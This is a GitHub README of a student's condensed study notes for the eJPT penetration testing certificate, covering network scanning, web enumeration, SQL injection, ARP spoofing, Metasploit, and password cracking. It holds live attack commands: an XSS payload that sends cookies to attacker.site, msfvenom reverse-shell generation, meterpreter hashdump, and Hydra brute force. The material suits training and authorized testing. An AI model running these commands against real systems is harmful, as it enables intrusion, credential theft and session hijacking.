Skip to content

eLearnSecurity Junior Penetration Tester Certificate (eJPT) PTS Notes

Notifications You must be signed in to change notification settings

osV22/ejpt_notes

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

21 Commits
 
 
 
 
 
 

Repository files navigation

eJPT Notes - eLearnSecurity Junior Penetration Tester Certificate Notes

Cert Header

NOTE

  • I am not - affiliated with eLearnSecurity in any way and these notes do not guarantee that you pass.
  • Replace 10.10.10.2 with the proper IP based on your situation

What is this?

  • The notes below are personal notes I took while studying for eLearnSecurity's eJPT certificate in their Penetration Testing Student (PTS) course.
    • I passed on the first attempt in great part due to the labs and taking notes throughout.

What this includes:

  • Condensed Notes (below this section): Short notes with snippets in case you forget a command/ concept
  • Full Notes: This includes explanations/ tidbits from the non-lab portions and can possibly help with general interview questions.

Condensed Notes:

Enumeration:

Ping Sweep:

  • fping: fping -a -g {IP RANGE} 2>/dev/null
    • EX: fping -a -g 10.10.10.0/8 2>/dev/null
  • Nmap Ping Sweep:
     nmap -sn 10.10.10.0/8 | grep -oP '(?<=Nmap scan report for )[^ ]*'
    

Nmap

  • Full Scan (All Ports, Syn, Scripts, Version, Speed):

     nmap -Pn -T4 --open -sS -sC -sV --min-rate=1000 --max-retries=3 -p- -oN scanReportForHost2 10.10.10.2
    
    • Replace -sS with -sT for full TCP
  • Quick Scan (WARNING NOT ALL PORTS):

     nmap -sC -sV 10.10.10.2
    
  • IP Range:

     nmap -sC -sV 10.10.10.2-33
    
  • Select IPs:

     nmap -sC -sV 10.10.10.2,3,6,9
    
  • Vulnerability Scan for specific services:

     nmap --script suspectedVulnScript(s)Here -p {PORT(s)} 10.10.10.2
    
  • Shares Enumeration:

     nbstat -A 10.10.10.2
     nmblookup -A 10.10.10.2
     smbclient //10.10.10.2/share -N # mounts share
     smbclient -L //10.10.10.2 -N # lists shares and omits NetBIOS asking for a pss
     enum4linux -a 10.10.10.2 

Banner Grabbing

  • Netcat format: nc {Target IP} {Port}
  • Netcat (HTTP Only):
     nc 10.10.10.2 80  
     HEAD / HTTP/1.0 #NOTE: PUT TWO EMPTY LINES AFTER! 
     				# EMPTY LINE HERE
     				# EMPTY LINE HERE AGAIN
    
  • Netcat (See all available verb OPTIONS):
     nc 10.10.10.2
     OPTIONS / HTTP/1.0 
    
  • OpenSSL (HTTPS)
     opnessl s_client -connect 10.10.10.2:443
     HEAD / HTTP/1.0
    

Wireshark Snippets

request.method == "POST"     
http & ip.src == 192.168.0.1     
tcp.port == xx     
tcp.srcport == xx     
http.request
  • After capturing/ opening traffic:
    • Follow -> TCP Stream

Web Enumeration

Web Scanning:

  • Nikto - General Scan:
     nikto -h http://10.10.10.2/
    

Directory Traversal:

  • gobuster (recommended):
     gobuster dir -u http://10.10.10.2/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
    
  • gobuster with auth and file extensions:
     gobuster dir -u http://10.10.10.2/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -U admin -x /,php,txt,bak,old,html,xxx
    
    • You might want to dial down the extensions -x php,txt based on the target you're after. In this case, we know the password for the user -U admin
  • dirb:
     dirb http://10.10.10.2/ /usr/share/wordlists/dirb/common.txt
    
  • dirb with auth:
     http://targetsite.site/ -u "admin:password"
    

Routing/ Pivoting:

  • route -n (linux) - Clean routing table. Definitely use this when setting up a route, makes seeing the Destination and Gateway more clear!
  • arp -a (linux/ windows) - Show you the ARP table, gateway, and iface
  • ip route (linux) - Show you the routing setup you have
  • Add Route/ Pivot:
    • ip route add {CONNECT TO THIS NETWORK} via {FROM THIS IP}
    • ip route add 10.10.10.0/8 via 10.10.10.99

Web Exploitation

SQL Injection (SQLi):

  • Basic union injection (Manual):

     xxxx' UNION SELECT null; -- -
    
  • Basic login bypass (Manual):

     ' or 1=1; -- -'  
    
  • SQLMap with a parameter:

     sqlmap -u 'http://vuln.site/item.php?id=203' -p id --technique=U # Enum 'id' parameter and use the UNION technique
    
     sqlmap -u http://10.10.10.2/item.php?id=203 --tables # Shows us all tables in the DB
    
  • SQLMap dump:

     sqlmap -u 'http://vuln.site/view.php?id=203' --dump # has potential to take down servers in IRL situations

Cross-Site Scripting (XSS):

  • Find a vulnerable input field: <script>alert('Fight On!')</script>
  • Steal cookie (helpful with stored-xss):
     <script\>
     var i \= new Image();
     i.src\="http://attacker.site/log.php?q="+document.cookie; 
     </script\>

Host Exploitation

ARP Spoofing

echo 1 > /proc/sys/net/ipv4/ip_forward # So once traffic reaches us, proceeds to the vicitm

arpspoof -i tap0 -t 10.10.10.2 -r 10.10.10.6

Metasploit

  • Basic Commands:
     search xxxx 		# EX: search tomcat
     use xxxx 			# EX: use 1... or use itemNameHere
     set xxxx 			# Configure target IP and whatever required settings required for the module/ exploit 
     options, show options, advanced options xxxx #Shows you all options for the payload/ module you have set
     show payloads 		# In case you need to switch to a bind shell in cases where a revshell or go all out for a meterpreter shell
     select payload xxxx # To actually switch to whatever payload you want
    
  • Generate a payload:
     msfvenom -p php/reverse_php lhost={Attacker IP} lport=443 -o revShell.php # Basic php reverse shell
    
     msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf # Linux reverse shell
    
  • Upgrade to a meterpreter shell:
     use post/multi/manager/shell_to_meterpreter
  • Meterpreter - Helpful Commands:
     background
     session -l # Lists your open sessions
     sessions -i 3 # Interact with/ open/ enter session 3
     getsystem # PrivEsc for Windows
     sysinfo, ifconfig, route, getuid # Internal Enumeration
     download thisFile.txt /in/my/directory/here
     hashdump # Dumps Windows SAM password hashes  

Netcat Listener

nc -nvlp 8888 # Listening on port 8888

Passwords

  • Prepare a file for John the Ripper to crack:
     unshadow passwd shadow > crackThisPls
    
  • Crack the passwords with John:
     john --wordlist=/my/wordlist/is/here.txt crackThisPls
    
  • Brute-force with Hydra:
    • Change ssh/ telnet to the service you are targeting
     hydra -L usersList.txt -P passList.txt -t 10 10.10.10.2 ssh -s 22 
     
     hydra -L usersList -P passList telnet://10.10.10.2 -V # verbose so you see real-time when a password is found

Last Minute Reminders

  • Once you compromise a box, cat the /etc/hosts file or it's equivalent to find other hosts. This was crucial in the labs.
  • You MUST do a full port scan, do not hurry, the labs had some ports without a full scan you would have missed.
    • T5 speed on nmap omits some ports for me, your experience may vary, I think sticking to T4 or less is wise.
  • For web: After you get some creds, try to pipe them into gobuster for an authenticated traversal.
  • If nmap's service version scan (-sV) is of no help, grab the banner with nc
  • If SQLi does not work right away, try appending commands instead of using a boolean:
    • Instead of page?id=21' or 1=1 -- -, insert the next statement directly, page?id=21 AND SELECT ...
  • Let gobuster run for a while, and run dirb as well and have it run for a while too, in case one of them does not catch a directory.
  • Again, seriously do not hurry and miss things out.
  • Enumerate! Enumerate! Enumerate! Everything. Every directory, file, if you get stuck.

Helpful Cheatsheets

About

eLearnSecurity Junior Penetration Tester Certificate (eJPT) PTS Notes

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published